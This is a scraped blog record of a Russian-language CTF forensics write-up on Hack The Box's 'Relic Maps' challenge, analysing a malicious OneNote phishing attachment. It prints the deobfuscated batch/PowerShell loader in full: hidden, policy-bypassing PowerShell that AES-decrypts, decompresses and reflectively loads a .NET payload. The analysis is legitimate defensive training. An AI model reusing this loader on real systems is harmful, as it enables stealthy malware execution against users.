{"id":347266,"date":"2023-03-25T09:00:30","date_gmt":"2023-03-25T09:00:30","guid":{"rendered":"http:\/\/savepearlharbor.com\/?p=347266"},"modified":"-0001-11-30T00:00:00","modified_gmt":"-0001-11-29T21:00:00","slug":"","status":"publish","type":"post","link":"https:\/\/savepearlharbor.com\/?p=347266","title":{"rendered":"Cyber\u00a0Apocalypse\u00a02023 (Relic Maps medium-level Forensics)<\/span>"},"content":{"rendered":"
<\/div>\n
\n
\n
\n
\n

\u0412 \u0441\u0440\u0435\u0434\u0443 \u0437\u0430\u0432\u0435\u0440\u0448\u0438\u043b\u0441\u044f\u00a0CTF\u00a0Cyber\u00a0Apocalypse\u00a02023<\/strong>\u00a0\u043e\u0442\u00a0Hack\u00a0The\u00a0Box, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u0440\u043e\u0445\u043e\u0434\u0438\u043b \u0441 18.03 \u043f\u043e 23.03. \u0412 \u0440\u0430\u043c\u043a\u0430\u0445\u00a0CTF\u00a0\u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a\u0430\u043c \u043f\u0440\u0435\u0434\u043b\u0430\u0433\u0430\u043b\u0438 \u0440\u0435\u0448\u0438\u0442\u044c 74 \u0437\u0430\u0434\u0430\u043d\u0438\u044f \u0432 \u0440\u0430\u0437\u043d\u044b\u0445 \u043e\u0431\u043b\u0430\u0441\u0442\u044f\u0445 \u043e\u0442\u00a0PWN\u00a0\u0434\u043e\u00a0Crypto\u00a0\u0438 \u0441 \u0440\u0430\u0437\u043d\u044b\u043c\u0438 \u0443\u0440\u043e\u0432\u043d\u044f\u043c\u0438 \u0441\u043b\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u043e\u0442\u00a0very\u00a0easy\u00a0\u0434\u043e\u00a0insane.<\/p>\n

\u0421 23.03 \u043f\u043e 26.03 \u043d\u0430\u0447\u0430\u043b\u043e\u0441\u044c\u00a0After\u00a0Party, \u0430 \u044d\u0442\u043e \u0437\u043d\u0430\u0447\u0438\u0442, \u0447\u0442\u043e \u0441\u0430\u043c\u043e\u0435 \u0432\u0440\u0435\u043c\u044f \u0434\u0435\u043b\u0438\u0442\u044c\u0441\u044f\u00a0WriteUp\u2019\u0430\u043c\u0438 =)\u00a0<\/p>\n

\u0417\u0434\u0435\u0441\u044c \u044f \u0431\u044b \u0445\u043e\u0442\u0435\u043b \u043f\u043e\u0434\u0435\u043b\u0438\u0442\u044c\u0441\u044f \u0440\u0435\u0448\u0435\u043d\u0438\u0435\u043c \u0437\u0430\u0434\u0430\u0447 \u0443\u0440\u043e\u0432\u043d\u044f\u00a0medium\u00a0\u0438\u0437 \u043e\u0431\u043b\u0430\u0441\u0442\u0438\u00a0Forensics, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0443\u0434\u0430\u043b\u043e\u0441\u044c \u0440\u0435\u0448\u0438\u0442\u044c \u0432 \u0445\u043e\u0434\u0435\u00a0CTF\u00a0\u0438 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e \u043e\u0434\u043d\u043e\u0439 \u0443\u0440\u043e\u0432\u043d\u044f\u00a0hard.<\/p>\n

\u0417\u0430\u0434\u0430\u043d\u0438\u0435:<\/p>\n

Pandora received an email with a link claiming to have information about the location of the relic and attached ancient city maps, but something seems off about it. Could it be rivals trying to send her off on a distraction? Or worse, could they be trying to hack her systems to get what she knows?Investigate the given attachment and figure out what’s going on and get the flag. The link is to http:\/\/relicmaps.htb:\/relicmaps.one. The document is still live (relicmaps.htb should resolve to your docker instance).<\/p>\n

\u0418\u0442\u0430\u043a, \u043c\u044b \u0432\u044b\u044f\u0441\u043d\u0438\u043b\u0438 \u0438\u0437 \u0437\u0430\u0434\u0430\u043d\u0438\u044f, \u0447\u0442\u043e \u041f\u0430\u043d\u0434\u043e\u0440\u0430 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0430\u00a0email\u00a0\u0441\u043e \u0441\u0441\u044b\u043b\u043a\u043e\u0439 \u0441 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0435\u0439 \u043e \u043c\u0435\u0441\u0442\u043e\u043f\u043e\u043b\u043e\u0436\u0435\u043d\u0438\u0438 \u0440\u0435\u043b\u0438\u043a\u0432\u0438\u0438 \u0438 \u0432\u043b\u043e\u0436\u0435\u043d\u043d\u044b\u0439 \u0444\u0430\u0439\u043b (\u043a\u0430\u0440\u0442\u0443 \u0434\u0440\u0435\u0432\u043d\u0435\u0433\u043e \u0433\u043e\u0440\u043e\u0434\u0430), \u043d\u043e \u0447\u0442\u043e-\u0442\u043e \u043f\u043e\u0448\u043b\u043e \u043d\u0435 \u043f\u043e \u043f\u043b\u0430\u043d\u0443\u2026
\u0418\u0437\u0443\u0447\u0435\u043d\u0438\u0435 \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u044b\u0445 \u0432\u043b\u043e\u0436\u0435\u043d\u0438\u0439 \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u0430\u044f \u043b\u044e\u0431\u043e\u0432\u044c =)<\/p>\n

\u0414\u0430\u0432\u0430\u0439\u0442\u0435 \u043d\u0430\u0439\u0434\u0435\u043c \u043f\u0440\u0438\u0447\u0438\u043d\u0443, \u043f\u043e\u0447\u0435\u043c\u0443 \u0434\u0435\u043b\u0430 \u041f\u0430\u043d\u0434\u043e\u0440\u044b \u043f\u043e\u0448\u043b\u0438 \u043d\u0435 \u0442\u0430\u043a, \u043a\u0430\u043a \u043e\u043d\u0430 \u0445\u043e\u0442\u0435\u043b\u0430, \u0434\u043b\u044f \u044d\u0442\u043e\u0433\u043e \u0437\u0430\u0433\u0440\u0443\u0437\u0438\u043c \u0444\u0430\u0439\u043b \u0432\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u0438\u0437 \u043f\u0438\u0441\u044c\u043c\u0430.<\/p>\n

\u0427\u0442\u043e\u0431\u044b \u0437\u0430\u0433\u0440\u0443\u0437\u0438\u0442\u044c \u0444\u0430\u0439\u043b \u0432\u043b\u043e\u0436\u0435\u043d\u0438\u044f, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u0440\u0438\u0441\u043b\u0430\u043b\u0438 \u041f\u0430\u043d\u0434\u043e\u0440\u0435, \u043d\u0443\u0436\u043d\u043e \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0442\u044c \u0447\u0435\u0440\u0435\u0437 \u043f\u043e\u0434\u043d\u044f\u0442\u044b\u0439 \u0432 \u0437\u0430\u0434\u0430\u043d\u0438\u0438 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440. \u0412\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u0441\u044f\u00a0wget\u00a0\u0438 \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u043f\u0440\u043e\u043a\u0441\u0438-\u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u0443\u043a\u0430\u0436\u0435\u043c \u0430\u0434\u0440\u0435\u0441 \u0438 \u043f\u043e\u0440\u0442 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u0430:<\/p>\n

wget http:\/\/relicmaps.htb:\/relicmaps.one -e use_proxy=yes -e http_proxy=167.71.143.44:32619<\/code><\/pre>\n
\u041f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0444\u0430\u0439\u043b \u0442\u0438\u043f\u0430\u00a0OneNote. \u041f\u043e\u0441\u043c\u043e\u0442\u0440\u0438\u043c, \u0447\u0442\u043e \u0432\u043d\u0443\u0442\u0440\u0438, \u0434\u043b\u044f \u044d\u0442\u043e\u0433\u043e \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u0441\u044f \u0443\u0442\u0438\u043b\u0438\u0442\u043e\u0439\u00a0strings.<\/p>\n
\"\u0421\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435<\/p>\n
\u0421\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u0444\u0430\u0439\u043b\u0430 relicmaps.one.<\/figcaption><\/div>\n<\/figure>\n
\u0417\u0434\u0435\u0441\u044c \u043c\u044b \u0432\u0438\u0434\u0438\u043c\u00a0VBScript\u00a0\u0438 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u0443\u044e \u0444\u0443\u043d\u043a\u0446\u0438\u044e\u00a0\u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0433\u043e \u0438\u0441\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f AutoOpen, \u0442\u0430\u043a\u0436\u0435 \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u0435\u043c \u0444\u0443\u043d\u043a\u0446\u0438\u0438 \u043f\u043e \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044e \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 \u0447\u0435\u0440\u0435\u0437\u00a0WMI\u00a0\u0438 \u043a\u043e\u0434 \u0434\u043b\u044f \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0437\u0430\u0433\u0440\u0443\u0437\u044f\u0442\u0441\u044f \u0441\u0440\u0430\u0437\u0443 \u043f\u043e\u0441\u043b\u0435 \u0442\u043e\u0433\u043e, \u043a\u0430\u043a \u0434\u0430\u043d\u043d\u044b\u0439 \u0444\u0430\u0439\u043b \u0431\u0443\u0434\u0435\u0442 \u043e\u0442\u043a\u0440\u044b\u0442 \u043d\u0430\u0448\u0435\u0439 \u041f\u0430\u043d\u0434\u043e\u0440\u043e\u0439.<\/p>\n
\u0414\u0430\u0432\u0430\u0439\u0442\u0435 \u0441\u043a\u0430\u0447\u0430\u0435\u043c \u0434\u0430\u043d\u043d\u044b\u0435 \u0444\u0430\u0439\u043b\u044b, \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u0441\u044f \u0430\u043d\u0430\u043b\u043e\u0433\u0438\u0447\u043d\u043e\u0439 \u0440\u0430\u043d\u0435\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u0435 \u0441 \u0443\u0442\u0438\u043b\u0438\u0442\u043e\u0439\u00a0wget.<\/p>\n
\u041c\u044b \u043f\u043e\u043b\u0443\u0447\u0438\u043c \u043f\u0430\u0440\u0443 \u0444\u0430\u0439\u043b\u043e\u0432:\u00a0topsecret-maps.one<\/strong>\u00a0&\u00a0window.bat<\/strong>. \u0421\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435\u00a0topsecret-maps.one\u00a0<\/strong>\u0441\u0445\u043e\u0436\u0435\u00a0\u0441 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u044b\u043c \u0440\u0430\u043d\u0435\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u0443\u0435\u043c\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430 relicmaps.one \u0438 \u043d\u0435 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u043d\u0438\u043a\u0430\u043a\u043e\u0439 \u0446\u0435\u043d\u043d\u043e\u0441\u0442\u0438, \u0441\u0441\u044b\u043b\u043a\u0438 \u0431\u0438\u0442\u044b\u0435 \u0438 \u0444\u0430\u0439\u043b\u043e\u0432 \u0442\u0430\u043a\u0438\u0445 \u0443\u0436\u0435 \u043d\u0435 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442, \u043a \u0442\u043e\u043c\u0443 \u0436\u0435 \u0440\u0435\u0441\u0443\u0440\u0441\u044b \u0432\u043f\u043e\u043b\u043d\u0435 \u043b\u0435\u0433\u0438\u0442\u0438\u043c\u043d\u044b\u0435.<\/p>\n
\"\u0421\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435<\/p>\n
\u0421\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 topsecret-maps.one<\/strong><\/figcaption><\/div>\n<\/figure>\n
\u0410 \u0432\u043e\u0442 \u0444\u0430\u0439\u043b window.bat<\/strong> (\u0437\u0430\u0433\u0440\u0443\u0436\u0435\u043d \u0440\u0430\u043d\u0435\u0435) \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0435 \u0441\u0442\u0440\u043e\u043a\u0438, \u0438\u0437 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0441\u0440\u0430\u0437\u0443 \u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u0441\u044f \u043f\u043e\u043d\u044f\u0442\u043d\u043e, \u0447\u0442\u043e\u00a0\u0434\u0336\u0430\u0336\u043b\u0336\u044c\u0336\u0448\u0336\u0435\u0336 \u0336\u0431\u0336\u0443\u0336\u0434\u0336\u0435\u0336\u0442\u0336 \u0336\u0438\u0336\u043d\u0336\u0442\u0336\u0435\u0336\u0440\u0336\u0435\u0336\u0441\u0336\u043d\u0336\u0435\u0336\u0435\u0336\u00a0\u0432 \u0441\u043a\u0440\u0438\u043f\u0442\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0441\u044f \u0434\u0435\u043e\u0431\u0444\u0443\u0441\u043a\u0430\u0446\u0438\u044f \u0441\u0442\u0440\u043e\u043a.<\/p>\n
<\/figure>\n
\u0412\u044b\u0432\u0435\u0434\u0435\u043c \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u043f\u043e\u0441\u043b\u0435 \u0434\u0435\u043e\u0431\u0444\u0443\u0441\u043a\u0430\u0446\u0438\u0438, \u0434\u043b\u044f \u044d\u0442\u043e\u0433\u043e \u0434\u043e\u043f\u0438\u0448\u0435\u043c\u00a0echo\u00a0\u043f\u0435\u0440\u0435\u0434 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u043c\u0438 \u0442\u0440\u0435\u043c\u044f \u0441\u0442\u0440\u043e\u043a\u0430\u043c\u0438 \u0438 \u0441\u043e\u0442\u0440\u0435\u043c cls, \u043f\u043e\u0441\u043b\u0435 \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u043c \u043d\u0430 \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u044c\u043d\u044b\u0439 \u043c\u0430\u0448\u0438\u043d\u0435. \u041f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0435 \u0441\u0442\u0440\u043e\u043a\u0438 \u0438 \u043a\u043e\u043c\u0430\u043d\u0434\u043b\u0435\u0442\u044b:<\/p>\n
copy C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe \/y \"C:\\Users\\Antony\\Desktop\\window.bat.exe\"  cd \"C:\\Users\\Antony\\Desktop\\\"  \"window.bat.exe\" -noprofile -windowstyle hidden -ep bypass -command  $eIfqq = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\\Users\\Antony\\Desktop\\window.bat').Split([Environment]::NewLine); foreach ($YiLGW in $eIfqq) { if ($YiLGW.StartsWith(':: ')) {  $VuGcO = $YiLGW.Substring(3); break; }; }; $uZOcm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($VuGcO); $BacUA = New-Object System.Security.Cryptography.AesManaged; $BacUA.Mode = [System.Security.Cryptography.CipherMode]::CBC; $BacUA.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; $BacUA.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0xdfc6tTBkD+M0zxU7egGVErAsa\/NtkVIHXeHDUiW20='); $BacUA.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2hn\/J717js1MwdbbqMn7Lw=='); $Nlgap = $BacUA.CreateDecryptor(); $uZOcm = $Nlgap.TransformFinalBlock($uZOcm, 0, $uZOcm.Length); $Nlgap.Dispose(); $BacUA.Dispose(); $mNKMr = New-Object System.IO.MemoryStream(, $uZOcm); $bTMLk = New-Object System.IO.MemoryStream; $NVPbn = New-Object System.IO.Compression.GZipStream($mNKMr, [IO.Compression.CompressionMode]::Decompress); $NVPbn.CopyTo($bTMLk); $NVPbn.Dispose(); $mNKMr.Dispose(); $bTMLk.Dispose(); $uZOcm = $bTMLk.ToArray(); $gDBNO = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($uZOcm); $PtfdQ = $gDBNO.EntryPoint; #$PtfdQ.Invoke($null, (, [string[]] ('')))<\/code><\/pre>\n
\u0414\u0430\u0432\u0430\u0439\u0442\u0435 \u0440\u0430\u0437\u0431\u0435\u0440\u0435\u043c\u0441\u044f, \u0447\u0442\u043e \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u0438\u0442 \u0432 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0438.<\/p>\n
\u0418\u0437 \u0444\u0430\u0439\u043b\u0430 \u0432 \u0441\u043a\u0440\u044b\u0442\u043e\u043c \u0440\u0435\u0436\u0438\u043c\u0435 \u0441\u0447\u0438\u0442\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0442\u0435\u043a\u0441\u0442 \u0438 \u0434\u0435\u043e\u0431\u0444\u0443\u0441\u0446\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0432 \u0446\u0438\u043a\u043b\u0435\u00a0<\/p>\n
foreach ($YiLGW in $eIfqq) {  if ($YiLGW.StartsWith(':: ')) {   $VuGcO = $YiLGW.Substring(3); break;  }; };<\/code><\/pre>\n
\u041f\u043e\u0441\u043b\u0435 \u0447\u0435\u0433\u043e \u0434\u0430\u043d\u043d\u044b\u0439 \u0442\u0435\u043a\u0441\u0442 \u0432 \u043a\u043e\u043d\u0432\u0435\u0440\u0442\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0438\u0437 \u0444\u043e\u0440\u043c\u0430\u0442\u0430\u00a0Base64 \u0438 \u0437\u0430\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0432 \u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u0443\u044e\u00a0$uZOcm.<\/p>\n
\u0414\u0430\u043b\u0435\u0435 \u043d\u0430\u0447\u0438\u043d\u0430\u0435\u0442\u0441\u044f \u0441\u0430\u043c\u043e\u0435 \u0432\u043a\u0443\u0441\u043d\u043e\u0435, \u0441\u043e\u0437\u0430\u0434\u0435\u0442\u0441\u044f \u043e\u0431\u044a\u0435\u043a\u0442\u00a0System.Security.Cryptography.AesManaged, \u0437\u0430\u0434\u0430\u0435\u0442\u0441\u044f\u00a0mode\u00a0CBC, \u043a\u043b\u044e\u0447 \u0438 \u0432\u0435\u043a\u0442\u043e\u0440 \u0434\u043b\u044f \u0440\u0430\u0441\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0434\u0435\u043a\u043e\u0434\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u0440\u0430\u043d\u0435\u0435 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0433\u043e, \u0434\u0430\u043d\u043d\u044b\u0439 \u043c\u0430\u0441\u0441\u0438\u0432 \u0431\u0430\u0439\u0442\u043e\u0432 \u0437\u0430\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0432 \u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u0443\u044e $uZOcm.
\u0412 \u043a\u043e\u043d\u0435\u0447\u043d\u043e\u043c \u0438\u0442\u043e\u0433\u0435 \u043c\u044b \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u044b\u0439 \u043a\u043e\u0434 \u0432 \u043f\u0430\u043c\u044f\u0442\u0438 (\u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u0430\u044f $PtfdQ) \u0438 $PtfdQ.Invoke\u00a0\u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0439 \u043a\u043e\u0434, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u043f\u0440\u0438 \u0442\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0438 \u043c\u044b \u044d\u0442\u0443 \u0441\u0442\u0440\u043e\u043a\u0443 \u0437\u0430\u043a\u043e\u043c\u043c\u0435\u043d\u0442\u0438\u0440\u0443\u0435\u043c.<\/p>\n
<\/figure>\n
\u0414\u0430\u0432\u0430\u0439\u0442\u0435 \u0432\u0435\u0440\u043d\u0435\u043c\u0441\u044f \u043d\u0430 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0448\u0430\u0433\u043e\u0432 \u043d\u0430\u0437\u0430\u0434 \u0432 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0438, \u0433\u0434\u0435 \u043c\u044b \u043c\u044b \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u043c\u0430\u0441\u0441\u0438\u0432 \u0431\u0430\u0439\u0442\u043e\u0432, \u0438 \u0437\u0430\u043f\u0438\u0448\u0435\u043c \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u044d\u0442\u043e\u0439 \u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u043e\u0439 \u0432 \u0444\u0430\u0439\u043b OutFile.dat \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 \u043a\u043e\u043c\u0430\u043d\u0434\u043b\u0435\u0442\u0430\u00a0Set-Content \u0443\u043a\u0430\u0437\u0430\u0432 \u043a\u043e\u0434\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 Byte:<\/p>\n
Set-Content -Path OutFile.dat -Value $uZOcm -Encoding Byte<\/code><\/pre>\n
\u0423\u0442\u0438\u043b\u0438\u0442\u0430 HxD \u043f\u043e\u043a\u0430\u0437\u044b\u0432\u0430\u044e\u0442 \u043d\u0430\u043c \u0437\u0430\u0433\u043e\u043b\u043e\u0432\u043e\u043a \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430 MZ.<\/p>\n
<\/figure>\n
\u041f\u043e\u0441\u043c\u043e\u0442\u0440\u0438\u043c \u044f\u0437\u044b\u043a, \u043d\u0430 \u043a\u043e\u0442\u043e\u0440\u043e\u043c \u043d\u0430\u043f\u0438\u0441\u0430\u043d \u0444\u0430\u0439\u043b \u0438 \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u043f\u0430\u043a\u0435\u0440\u043e\u0432 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0443\u0442\u0438\u043b\u0438\u0442\u044b\u00a0Detect\u00a0It\u00a0Easy.<\/p>\n
<\/figure>\n
\u0418\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u044b\u0439 \u0444\u0430\u0439\u043b \u043d\u0430\u043f\u0438\u0441\u0430\u043d \u043d\u0430 \u044f\u0437\u044b\u043a\u0435 \u00a0\u0421# \u0438 \u043d\u0435 \u0443\u043f\u0430\u043a\u043e\u0432\u0430\u043d, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u043c\u043e\u0436\u0435\u043c \u0432\u0437\u0433\u043b\u044f\u043d\u0443\u0442\u044c \u043d\u0430 \u0435\u0433\u043e \u043a\u043e\u0434 \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0432\u0448\u0438\u0441\u044c \u0443\u0442\u0438\u043b\u0438\u0442\u043e\u0439\u00a0dnSpy.<\/p>\n
<\/figure>\n
\u0418 \u0437\u0434\u0435\u0441\u044c \u043d\u0430\u0441 \u0441 \u0432\u0430\u043c\u0438 \u0436\u0434\u0435\u0442 \u0444\u043b\u0430\u0433! =)
\u0412\u043e\u0442 \u0442\u0430\u043a\u0430\u044f \u043d\u0435\u0441\u043b\u043e\u0436\u043d\u0430\u044f \u0437\u0430\u0434\u0430\u0447\u043a\u0430 \u0443\u0440\u043e\u0432\u043d\u044f\u00a0medium\u00a0\u043f\u043e\u043f\u0430\u043b\u0430\u0441\u044c \u043d\u0430 \u044d\u0442\u043e\u043c\u00a0CTF\u00a0\u0432 \u0440\u0430\u0437\u0434\u0435\u043b\u0435\u00a0Forensics.<\/p>\n<\/div>\n<\/div>\n<\/div>\n
  <\/div>\n
  
 \u0441\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b \u0441\u0442\u0430\u0442\u044c\u0438  https:\/\/habr.com\/ru\/post\/724718\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
<\/div>\n
\n
\n
\n
\n
\u0412 \u0441\u0440\u0435\u0434\u0443 \u0437\u0430\u0432\u0435\u0440\u0448\u0438\u043b\u0441\u044f\u00a0CTF\u00a0Cyber\u00a0Apocalypse\u00a02023<\/strong>\u00a0\u043e\u0442\u00a0Hack\u00a0The\u00a0Box, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u0440\u043e\u0445\u043e\u0434\u0438\u043b \u0441 18.03 \u043f\u043e 23.03. \u0412 \u0440\u0430\u043c\u043a\u0430\u0445\u00a0CTF\u00a0\u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a\u0430\u043c \u043f\u0440\u0435\u0434\u043b\u0430\u0433\u0430\u043b\u0438 \u0440\u0435\u0448\u0438\u0442\u044c 74 \u0437\u0430\u0434\u0430\u043d\u0438\u044f \u0432 \u0440\u0430\u0437\u043d\u044b\u0445 \u043e\u0431\u043b\u0430\u0441\u0442\u044f\u0445 \u043e\u0442\u00a0PWN\u00a0\u0434\u043e\u00a0Crypto\u00a0\u0438 \u0441 \u0440\u0430\u0437\u043d\u044b\u043c\u0438 \u0443\u0440\u043e\u0432\u043d\u044f\u043c\u0438 \u0441\u043b\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u043e\u0442\u00a0very\u00a0easy\u00a0\u0434\u043e\u00a0insane.<\/p>\n
\u0421 23.03 \u043f\u043e 26.03 \u043d\u0430\u0447\u0430\u043b\u043e\u0441\u044c\u00a0After\u00a0Party, \u0430 \u044d\u0442\u043e \u0437\u043d\u0430\u0447\u0438\u0442, \u0447\u0442\u043e \u0441\u0430\u043c\u043e\u0435 \u0432\u0440\u0435\u043c\u044f \u0434\u0435\u043b\u0438\u0442\u044c\u0441\u044f\u00a0WriteUp\u2019\u0430\u043c\u0438 =)\u00a0<\/p>\n
\u0417\u0434\u0435\u0441\u044c \u044f \u0431\u044b \u0445\u043e\u0442\u0435\u043b \u043f\u043e\u0434\u0435\u043b\u0438\u0442\u044c\u0441\u044f \u0440\u0435\u0448\u0435\u043d\u0438\u0435\u043c \u0437\u0430\u0434\u0430\u0447 \u0443\u0440\u043e\u0432\u043d\u044f\u00a0medium\u00a0\u0438\u0437 \u043e\u0431\u043b\u0430\u0441\u0442\u0438\u00a0Forensics, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0443\u0434\u0430\u043b\u043e\u0441\u044c \u0440\u0435\u0448\u0438\u0442\u044c \u0432 \u0445\u043e\u0434\u0435\u00a0CTF\u00a0\u0438 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e \u043e\u0434\u043d\u043e\u0439 \u0443\u0440\u043e\u0432\u043d\u044f\u00a0hard.<\/p>\n
\u0417\u0430\u0434\u0430\u043d\u0438\u0435:<\/p>\n
Pandora received an email with a link claiming to have information about the location of the relic and attached ancient city maps, but something seems off about it. Could it be rivals trying to send her off on a distraction? Or worse, could they be trying to hack her systems to get what she knows?Investigate the given attachment and figure out what’s going on and get the flag. The link is to http:\/\/relicmaps.htb:\/relicmaps.one. The document is still live (relicmaps.htb should resolve to your docker instance).<\/p>\n
\u0418\u0442\u0430\u043a, \u043c\u044b \u0432\u044b\u044f\u0441\u043d\u0438\u043b\u0438 \u0438\u0437 \u0437\u0430\u0434\u0430\u043d\u0438\u044f, \u0447\u0442\u043e \u041f\u0430\u043d\u0434\u043e\u0440\u0430 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0430\u00a0email\u00a0\u0441\u043e \u0441\u0441\u044b\u043b\u043a\u043e\u0439 \u0441 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0435\u0439 \u043e \u043c\u0435\u0441\u0442\u043e\u043f\u043e\u043b\u043e\u0436\u0435\u043d\u0438\u0438 \u0440\u0435\u043b\u0438\u043a\u0432\u0438\u0438 \u0438 \u0432\u043b\u043e\u0436\u0435\u043d\u043d\u044b\u0439 \u0444\u0430\u0439\u043b (\u043a\u0430\u0440\u0442\u0443 \u0434\u0440\u0435\u0432\u043d\u0435\u0433\u043e \u0433\u043e\u0440\u043e\u0434\u0430), \u043d\u043e \u0447\u0442\u043e-\u0442\u043e \u043f\u043e\u0448\u043b\u043e \u043d\u0435 \u043f\u043e \u043f\u043b\u0430\u043d\u0443\u2026
\u0418\u0437\u0443\u0447\u0435\u043d\u0438\u0435 \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u044b\u0445 \u0432\u043b\u043e\u0436\u0435\u043d\u0438\u0439 \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u0430\u044f \u043b\u044e\u0431\u043e\u0432\u044c =)<\/p>\n
